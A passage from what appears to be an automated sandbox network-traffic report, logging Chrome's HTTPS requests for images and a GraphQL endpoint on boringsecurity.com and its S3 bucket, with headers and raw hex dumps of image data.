                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC508INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 72 65 62 65 6c 5f 30 66 30 35 62 33 31 65 38 30 2e 6a 70 67 3f 75 72
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:45:00 GMTLocation: /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg?ur
                                                                          2023-12-10 16:45:00 UTC219INData Raw: 64 35 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 72 65 62 65 6c 5f 30 66 30 35 62 33 31 65 38 30 2e 6a 70 67 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 72 65 62 65 6c 5f 30 66 30 35 62 33 31 65 38 30 2e 6a 70 67 26 77 3d 34 38 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: d5Redirecting to /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg&w=48&q=75
                                                                          2023-12-10 16:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          163192.168.2.54989975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC544OUTGET /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg&w=1080&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC411INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 30 35 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 31 33 61 39 66 2d 47 62
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 80543Content-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:00 GMTEtag: "13a9f-Gb
                                                                          2023-12-10 16:45:00 UTC775INData Raw: ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 03 e8 03 e8 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 05 04 06 ff c4 00 17 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 fc 20 00 a0 00 b0 58 28 00 00 52 00 52 54 2d 80 52 58 0b 0b 28 00 42 94 94 05 22 c0 0a
                                                                          Data Ascii: C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222" X(RRT-RX(B"
                                                                          2023-12-10 16:45:00 UTC2372INData Raw: 65 00 5c 8a b0 28 00 02 0a 51 2f 63 e7 d7 a9 e8 dc fe 73 e8 fd b7 7d 4f c6 f6 fd 6f 33 c1 fb 7e fe 16 18 c1 f6 72 e1 83 ea 7c fa 37 f3 b4 7c fc 7d 2e 87 e7 3e 5f d8 f4 97 f0 5c ff 00 63 c2 3f 26 f7 3c c9 af 99 d3 9c a2 89 61 41 50 58 05 80 00 46 36 2a 91 60 58 52 12 c1 50 54 a2 04 a8 14 49 44 50 00 09 41 07 34 a4 b4 4a 04 a2 c1 40 4a 2c a1 28 4a 00 29 2c 05 85 94 0a 45 84 05 a8 54 a0 85 b0 2f 5f 66 cf 0b d1 fd 5f dd ac fe 7f dd 7c 36 7a 5a f2 a1 f6 7c dc a9 26 a5 8c d1 71 60 ce f0 4b 69 95 86 b3 9d 45 c6 e2 f3 a8 7d bd 3e 28 74 f3 3e ee a7 e5 fe 5f df 79 99 d7 e4 9e 9f c1 2e 17 32 d0 58 00 4b 29 65 86 6d a4 d4 a4 96 05 0c eb 25 94 00 9a 80 80 00 20 25 85 41 6c 09 61 50 73 50 00 00 2c a2 05 4a 50 00 02 81 05 94 00 b2 89 44 58 0a 22 84 a1 7d 34 f3 fd 9f 7f
                                                                          Data Ascii: e\(Q/cs}Oo3~r|7|}.>_\c?&<aAPXF6*`XRPTIDPA4J@J,(J),ET/_f_|6zZ|&q`KiE}>(t>_y.2XK)em% %AlaPsP,JPDX"}4
                                                                          2023-12-10 16:45:00 UTC538INData Raw: 59 6b a7 0c ba f3 77 38 76 e5 90 ef 83 5c 6e 8c 6b af ce 76 f0 3d 5f 2f 77 87 5e 57 a5 ce ba f2 3a 71 ba 31 bb c8 e9 8b d8 e3 be 54 3e 8f 9c ed c5 d0 e7 d3 38 2c d6 cc 5c 09 8f a3 e7 87 dd e7 7a 79 be df cf 70 80 b9 fc cf eb 7f 25 2a 69 28 0a 02 14 a4 b0 45 80 02 92 00 85 41 80 52 0a 85 04 b2 95 05 02 c0 00 14 1d 3f 43 e1 fe 87 78 f4 79 5c dc ba e3 4b f9 5e 56 73 e9 77 9e bd 71 98 16 6c 62 c0 bd 78 8b 3b 9c f3 06 e6 a1 9b 9d 12 ef 91 a8 ea 72 81 bf 43 e1 c4 7b dd 3e 4f af 8e 72 df 33 59 76 39 cc d3 79 ef c0 c7 5c 7c 55 f2 fc bb e7 d7 5d 32 eb 5c 99 1a 9d 78 8d f3 ec 73 9a c9 bc dd 9c ee 34 2f 4e 23 59 e8 63 36 1d 39 ea 9c c8 73 f4 bc ff 00 af 17 d4 fa 3c ff 00 bc e7 03 b7 e5 3f 57 f9 c8 f9 52 cd 54 05 02 1a 40 05 88 0c 94 86 92 91 41 07 39 40 02 84 a0 15
                                                                          Data Ascii: Ykw8v\nkv=_/w^W:q1T>8,\zyp%*i(EAR?Cxy\K^Vswqlbx;rC{>Or3Yv9y\|U]2\xs4/N#Yc69s<?WRT@A9@
                                                                          2023-12-10 16:45:00 UTC4744INData Raw: 12 79 f0 97 b7 93 ea 79 51 e4 a5 9a b7 3a 04 1a cd 00 8a 21 0b 14 4b 0a 04 b0 20 c4 b0 50 58 28 2c b0 a9 40 00 20 50 03 b7 ea ff 00 29 fa 6d e3 e8 96 6b 32 4d 67 5f 9e e5 d7 84 d6 f5 9f a3 79 e7 90 3a f3 2c 9b 31 d3 7f 39 4f a4 fa fe cf 3f d1 e5 93 bf 2c a4 9d 4e 7a df 12 e7 a7 63 e5 f8 fe e5 78 78 fd 57 8f bb e6 59 d7 77 96 99 35 ec 78 fd 64 fb 7c b8 5b be bf 35 5b 9f a8 f9 fe 9f 47 af 39 f3 77 eb bc cc 66 52 6f b7 cd 12 bb 57 2c ef 11 af cf fe 97 f3 db bc a4 bd 2a f4 e2 5b 3b 9c 71 46 b3 d3 26 73 61 cf be 3a e5 f7 fa 7f 07 de 7c 8a 97 5e 57 ab e4 47 99 65 9a a0 00 50 40 b0 10 94 2c 05 82 ca 32 0c 40 b2 80 15 46 37 0c e8 16 51 2c 25 43 49 44 d4 3b fe 93 f3 de de f1 f7 4c dd 66 7d 7f 27 7c eb f2 fc fa e3 3a de 65 e9 9b d2 60 03 af 3d 60 ba e7 d8 ce 43 d0
                                                                          Data Ascii: yyQ:!K PX(,@ P)mk2Mg_y:,19O?,NzcxxWYw5xd|[5[G9wfRoW,*[;qF&sa:|^WGeP@,2@F7Q,%CID;Lf}'|:e`=`C
                                                                          2023-12-10 16:45:00 UTC5930INData Raw: b4 8d 71 07 e4 a5 29 64 02 6d 63 e4 18 e4 a0 29 56 7b f9 08 ac 02 88 c0 5f 76 7b 44 56 01 44 70 87 08 8c fd df 37 37 0e b6 d3 98 1e 7c d2 18 64 ae 61 d5 68 c3 da e6 ed ff 00 e6 5f e2 63 8d d2 3f 4d a7 a4 c8 c4 11 98 85 ba 3d 8d c0 1b 94 da c6 e9 93 e4 7c ae 5d aa 40 64 23 c6 6a 87 ca 17 95 e4 f1 9a c5 a0 2d 79 41 1e 32 45 7c d0 4e e8 4b 76 ca da 39 8e 12 e4 d1 1b 1f ab d1 ef 4e 6d 1f d0 98 c3 23 b4 d0 a8 9a dd 3c 72 ea 1e e7 fd 6b 4f 36 e7 9e da 37 2d 56 bd 57 27 85 5f 35 e6 c0 5d e1 b4 89 b5 58 bc 87 50 ef 03 84 4d e0 76 5d 79 bc f5 90 8a eb 01 46 f7 31 d0 ca cd 4b 48 20 c6 dd f2 cd 36 e5 45 41 39 89 da cd 30 90 b9 bb 4f e8 00 6e 30 45 b5 06 b7 4d 15 ef d2 c6 38 0d b5 aa 3b 75 6e 3b 96 af 56 65 2b b5 55 80 88 ac 0e 11 18 f3 41 c3 02 8a 22 b0 d2 9c da c3
                                                                          Data Ascii: q)dmc)V{_v{DVDp77|dah_c?M=|]@d#j-yA2E|NKv9Nm#<rkO67-VW'_5]XPMv]yF1KH 6EA90On0EM8;un;Ve+UA"
                                                                          2023-12-10 16:45:00 UTC7116INData Raw: e1 ce 6a a6 9e e1 ce 6a a6 9e e1 e5 7b de e1 82 d5 41 dc 37 43 05 aa a6 c8 f0 0c 11 af c7 38 e3 1b cd f6 9e b7 9b 31 c4 2e 4d 34 98 77 1b 31 83 3d 57 b1 70 37 9c 06 9f a8 70 22 ef 55 7b 1c 2a 28 a2 d8 a2 8a 28 b8 4e 08 1c 00 bd 35 d2 7e 21 19 c2 2a 0b b9 ef 08 44 14 6f 3a 94 54 07 f0 07 3b ce 11 b1 e7 14 5b 5f 3a c6 28 b8 56 f5 90 51 71 a8 b2 ca 28 84 51 0f f0 1f ff c4 00 26 11 00 01 03 04 03 00 03 00 02 03 00 00 00 00 00 00 01 00 02 11 10 20 30 31 12 40 50 21 41 51 32 71 61 80 a0 ff da 00 08 01 02 01 01 3f 01 ff 00 74 b8 95 c5 40 b2 4d 60 2e 2b 8f a3 0b 88 fb ac 64 85 1e 64 28 fd b6 42 e4 17 25 c8 a9 2a 4a 92 b9 2e 4a 45 b1 e5 00 bf ab 39 fe 29 34 82 b8 ae 2b 8a e2 b8 ae 2a 0d 66 d8 f1 c0 b0 bb f2 90 a3 1c 28 a4 f9 20 45 49 85 24 a0 10 19 e1 45 01 f1 80
                                                                          Data Ascii: jj{A7C81.M4w1=Wp7p"U{*((N5~!*Do:T;[_:(VQq(Q& 01@P!AQ2qa?t@M`.+dd(B%*J.JE9)4+*f( EI$E
                                                                          2023-12-10 16:45:00 UTC8302INData Raw: 10 a6 b3 dc 4c 8c c1 b8 92 13 6f f5 39 85 8d cd 2b f9 44 54 b2 b3 f3 01 28 7e e6 1d 36 3e 34 bf 98 35 b3 c0 d2 57 11 01 7b 70 47 1b f1 62 d1 8e e7 31 14 92 b2 f8 9d 3f 94 1c e7 0f 70 64 88 69 21 47 a6 60 f1 22 28 95 95 5f 52 ae 0f a0 64 b6 cd 81 93 b9 88 bd 8f 8f 99 61 3d 37 9f 89 50 f1 77 e5 f4 dc 57 bf 43 0f 3a f3 f3 37 e9 e3 f1 8f 35 e7 98 22 db 06 3e 21 b1 67 43 ac 55 8d e6 06 da 29 23 0d a0 27 11 56 b5 d2 f1 2d 85 99 f8 87 88 ff 00 62 56 26 79 e3 b8 53 5a 9b dc c4 b6 0f 0d d4 41 d1 2c 85 20 96 8c ac 16 ab b4 97 36 c5 b8 e5 d1 2e 5b cf 11 1c 95 1c ea 5a aa 2d 10 d0 d0 ea 5b b9 b7 59 60 d5 dc 1a a8 b7 31 b3 ae 88 33 22 37 c4 39 9c c0 a1 05 b4 65 82 dd b9 97 53 2b 7c c7 75 9e bc 5a f3 a8 63 6e 02 57 c4 75 50 78 cd ab 71 7f 38 85 8d 98 4d 27 10 16 0e 09
                                                                          Data Ascii: Lo9+DT(~6>45W{pGb1?pdi!G`"(_Rda=7PwWC:75">!gCU)#'V-bV&ySZA, 6.[Z-[Y`13"79eS+|uZcnWuPxq8M'
                                                                          2023-12-10 16:45:00 UTC6058INData Raw: c4 1c 11 7f 74 fe 72 5e 6c 22 ec b8 fb 8b 13 f7 20 da 8d 0b cc b3 ff 00 93 2c b7 5b 81 97 9e 89 95 f5 98 0d ba ea b9 88 0b 03 44 07 55 fb 83 89 84 e6 22 a2 72 20 01 ea 11 00 f7 0a b8 8a d7 37 b2 d0 b9 48 39 6e 07 12 dc 27 f9 aa 18 ad 52 aa 14 ac d7 fd 9c ea a3 6a 2f 2b d4 cc 16 54 fb f3 c7 a4 d3 ea af 17 ec 3f 98 34 8c 72 9c 69 fa 9a 13 00 b1 ee 04 54 e1 df dc b4 8e ef a8 83 fb 8b fb 9f dc b8 2f 11 06 8e 7c 56 a5 03 3b 62 6c 77 e3 94 aa 9a fc 13 13 f4 b9 85 db 7d 19 5e bf 81 85 e3 37 35 40 b9 95 ee 67 68 03 6e 57 88 aa bd f8 22 5a 60 96 15 c4 e7 c2 95 1c fc ca 85 35 57 08 af fb f0 90 67 68 ed b9 a8 06 38 c7 12 e5 df dc 44 96 db e2 7d 42 ba 0f b6 18 d3 7f 2c b9 34 00 b9 d4 c0 46 a0 5b 00 a2 ff 00 99 f7 08 55 e6 2c 9e 01 9e 09 6e 38 8a 1d 03 58 f9 30 98 55
                                                                          Data Ascii: tr^l" ,[DU"r 7H9n'Rj/+T?4riT/|V;blw}^75@ghnW"Z`5Wgh8D}B,4F[U,n8X0U
                                                                          2023-12-10 16:45:00 UTC10674INData Raw: 47 38 30 4a 04 81 8f 04 43 8f 34 23 c9 34 50 09 19 0c bb d7 15 52 59 5a dd 28 03 88 0c 25 50 0b 23 8b 14 91 cf 74 25 53 49 af 58 d9 90 4c 10 60 09 0c d0 4e 00 40 07 0c 93 cf 30 21 80 34 b1 8d 14 fc 83 01 d4 85 71 1a 59 20 91 84 19 a5 43 d0 b3 02 1a c6 69 6d d7 d4 64 97 d8 67 c1 87 38 80 08 20 01 45 3c f1 ca 38 f2 c4 08 20 80 1c 30 4f 87 27 23 e1 36 83 45 61 c6 eb fe 37 24 b7 1e cd 4e f0 95 d5 5f 49 94 71 18 23 5c 34 81 89 10 a3 93 05 c6 c1 30 11 07 20 d2 0c 30 02 4c 3c 43 03 3f e0 89 69 b4 19 0c b4 9e 09 83 5b 5d 86 82 65 14 18 69 15 50 79 1f 11 4a e7 47 10 22 4d 20 01 05 19 c7 d3 6c 33 89 2c 02 0e 38 50 87 30 73 2d fb 3d cc 55 57 1e 5c 51 d0 60 93 5c 61 23 91 69 37 d4 55 c5 13 2d bb 1a 40 c1 4d 34 10 47 00 d2 cd 71 c4 0e 10 31 4f 0c 92 0a 00 02 85 34 20
                                                                          Data Ascii: G80JC4#4PRYZ(%P#t%SIXL`N@0!4qY Cimdg8 E<8 0O'#6Ea7$N_Iq#\40 0L<C?i[]eiPyJG"M l3,8P0s-=UW\Q`\a#i7U-@M4Gq1O4


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          164192.168.2.54989723.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:07 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:45:00 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          165192.168.2.5498953.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC669OUTGET /thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_3940_91e199a0b7.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 30 57 70 31 73 66 6f 39 31 54 4b 43 35 7a 49 51 66 77 6e 69 4d 2f 44 34 4c 56 67 38 67 5a 6c 52 49 65 77 74 6f 58 55 44 61 38 41 45 6a 71 4e 78 55 47 77 67 39 51 58 69 34 56 36 63 7a 7a 39 77 68 49 48 30 2b 43 4b 62 70 2f 30 4a 42 6c 42 70 6d 38 33 4b 71 6e 6b 75 5a 35 2b 66 65 64 78 4c 63 42 62 54 44 53 43 56 6b 73 41 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 50 4e 48 33 33 42 50 4b 46 50 53 34 32 47 51 48 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 32 20 53 65 70 20 32 30 32 32 20 32 33 3a 35 39 3a 35 31 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: 0Wp1sfo91TKC5zIQfwniM/D4LVg8gZlRIewtoXUDa8AEjqNxUGwg9QXi4V6czz9whIH0+CKbp/0JBlBpm83KqnkuZ5+fedxLcBbTDSCVksA=x-amz-request-id: PNH33BPKFPS42GQHDate: Sun, 10 Dec 2023 16:45:01 GMTLast-Modified: Thu, 22 Sep 2022 23:59:51 GM
                                                                          2023-12-10 16:45:00 UTC3597INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec bd 75 5c 94 e9 bb 3f ce 76 d9 dd 49 89 4a 77 77 c3 00 c3 d0 8d a8 28 21 62 80 a2 28 2a 8d 08 28 dd 0d 76 77 d7 1a 6b d7 ae bb ae dd 52 d3 0c 73 5f bf d7 75 c3 20 ba bb e7 fc ce f7 7c ce 47 fd c8 1f d7 eb 79 86 99 79 86 99 fb fd bc af be 6e a9 e8 aa 8d 5f ed 01 90 5a 7d 64 fb 0f a5 f7 5f 2e 2a 7f d8 74 bd e2 51 6b 47 c5 a3 56 51 af f4 fe 06 15 ff 8b df a0 fc 61 f3 8d d2 3f 5f 2e 4e 3a b2 f7 07 c4 d8 a2 ba 6d 5f 49 ed 06 90 ca fb ed de f8 f2 47 2d 57 2a 1f b3 a1 f2 09 07 85 74 1d 7b a5 f7 37 80 ff d5 6f f0 98 0d 88 ad dc df ee 4d d8 01 20 25 b5 e6 f4 c1 1f cb 1f b5
                                                                          Data Ascii: PNGIHDRMpHYs IDATxu\?vIJww(!b(*(vwkRs_u |Gyyn_Z}d_.*tQkGVQa?_.N:m_IG-W*t{7oM %
                                                                          2023-12-10 16:45:00 UTC13904INData Raw: 40 e3 b5 d4 94 a6 8a 22 8a eb 38 f5 6f c4 d4 63 ff 98 d7 ec 93 05 5c cf 92 70 4c 05 d1 94 cf 73 7e 47 cc a6 bd 1c 39 0d ed 37 b3 4d c7 0b 8e c7 69 c1 cd 24 3d c8 f1 91 25 d6 0a 7d c9 b6 50 69 6a 97 3d 2b 71 a5 49 f7 fb 05 4c 88 b2 1c 0d b3 4d 46 a3 07 4a 13 f4 7f 64 db 40 98 f1 50 92 19 a0 4a ed c0 a6 0a 37 82 81 dc 32 9f d1 a0 23 37 84 67 67 6f db ee e3 ee 04 54 4d ba 3a d2 a3 8f 3b f5 32 89 99 89 21 5f 4d 45 91 ad a7 a9 c4 76 b4 d4 e5 3a 59 e9 b1 1d 2c 74 79 0e 96 7a 5c fc 9b a6 9a 22 5b 4b 43 95 ad ab a3 c9 b6 b2 30 69 67 b9 38 88 7c ba 00 e8 d3 65 e7 49 40 e4 e1 ca 10 6b 69 aa 71 8c 75 55 38 15 19 51 e2 57 97 6a e1 cd d5 7a 78 7a a1 9a b4 5c 6f 04 2f 67 33 ae 9d b5 b9 10 01 ce b0 32 06 73 0f 9f d6 da d7 1d 62 ac f3 fb 58 d7 ec 93 07 1c 1e 11 6c f5 6f
                                                                          Data Ascii: @"8oc\pLs~G97Mi$=%}Pij=+qILMFJd@PJ72#7ggoTM:;2!_MEv:Y,tyz\"[KC0ig8|eI@kiquU8QWjzxz\o/g32sbXlo
                                                                          2023-12-10 16:45:00 UTC8691INData Raw: 87 47 e7 2a 61 6f e5 2a 08 f5 b1 03 6b 7d 0d 60 5a 18 c3 2c 96 23 44 f9 b9 91 98 19 de b0 64 a6 0f 59 31 37 10 bc ed cd 21 73 59 04 f9 f5 70 3d 5c df 5f 05 f3 82 dc 61 ae 97 0b c4 85 fa c3 8a 39 01 c0 b4 30 01 8d 71 52 10 63 29 45 66 59 4b 91 81 7d be 01 75 33 a3 b6 e2 7b cd 02 2c c8 ec 65 b8 7f 23 c3 cd ca 29 61 eb a8 29 12 3a cc a6 0b 70 9d 7b 6d d9 13 1c e5 8a e7 b8 41 08 7a b1 b4 40 d3 ce 12 0c 74 35 04 3f fd f8 03 17 41 37 69 f4 20 62 6f 38 55 ec 60 ac 08 ba aa b2 64 ba fc 44 dc 1d 10 ac 8c 35 88 b3 b5 3e 09 f1 b4 26 ab 16 f8 93 86 dc 25 b0 ad 68 39 39 54 9b 44 7e d9 9d 43 7e 3f 51 8a ea 91 3c bb 58 43 9e 5d ac 25 08 c2 5b 87 0b e1 c4 c6 34 a8 5b 1f 43 56 ce f3 c4 bd b7 40 61 d2 30 22 37 61 1c 59 3c c3 97 c4 cf 09 20 0b 02 3d 48 94 bf 1b 89 f2 63 a1
                                                                          Data Ascii: G*ao*k}`Z,#DdY17!sYp=\_a90qRc)EfYK}u3{,e#)a):p{mAz@t5?A7i bo8U`dD5>&%h99TD~C~?Q<XC]%[4[CV@a0"7aY< =Hc


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          166192.168.2.5498963.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC626OUTGET /thumbnail_bc1_4d96972cb3.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
